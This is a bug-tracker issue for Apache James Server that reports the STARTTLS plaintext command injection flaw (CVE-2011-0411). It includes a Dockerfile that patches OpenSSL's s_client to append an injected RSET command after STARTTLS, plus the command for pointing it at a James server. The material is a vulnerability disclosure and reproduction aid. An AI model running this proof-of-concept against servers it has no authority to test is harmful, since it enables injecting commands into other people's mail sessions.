Uploaded image for project: 'James Server'
  1. James Server
  2. JAMES-1862

Plaintext command injection of STARTTLS (CVE-2011-0411)

    XMLWordPrintableJSON

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 3.0-beta4
    • Fix Version/s: None
    • Component/s: James Core
    • Labels:
    • Environment:
      centos6/7/windows openjdk8/jdk8 jboss eap6.4.2

      Description

      Security issue described by this post :
      Plaintext command injection in multiple implementations of STARTTLS
      http://www.postfix.org/CVE-2011-0411.html

      here you will find a dockerfile to run patched openssl, as described in previous link, to see the security issue.

      FROM centos:latest
      ### Some env variables
      ENV OPENSSL_VERSION="1.0.2d"
      RUN yum clean all \
      && yum -y update \
      ### Install tool for compiling
      && yum -y install gcc \
      && yum -y install make \
      && yum -y install wget \
      && yum -y install tar \
      && yum -y install perl \
      && yum clean all
      ### BUILD OpenSSL
      RUN wget "https://www.openssl.org/source/openssl-${OPENSSL_VERSION}.tar.gz" -P /tmp/ \
      && tar -xvf /tmp/openssl-${OPENSSL_VERSION}.tar.gz \
      && rm -rf /tmp/openssl-${OPENSSL_VERSION}.tar.gz
      RUN sed -i -e 's/BIO_printf(sbio, "STARTTLS\\r\\n")/BIO_printf(sbio, "STARTTLS\\r\\nRSET\\r\\n")/g' openssl-${OPENSSL_VERSION}/apps/s_client.c
      RUN cd openssl-${OPENSSL_VERSION} \
      && ./Configure linux-x86_64 \
      && make \
      && make install \
      && cd .. \
      && rm -rf openssl-${OPENSSL_VERSION}
      
      ############
      # run this command in container :
      # /usr/local/ssl/bin/openssl s_client -quiet -starttls smtp -connect {replace with your james listen address}:{replace with your james listen port}
      
      

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              ldoumerc Luc
            • Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: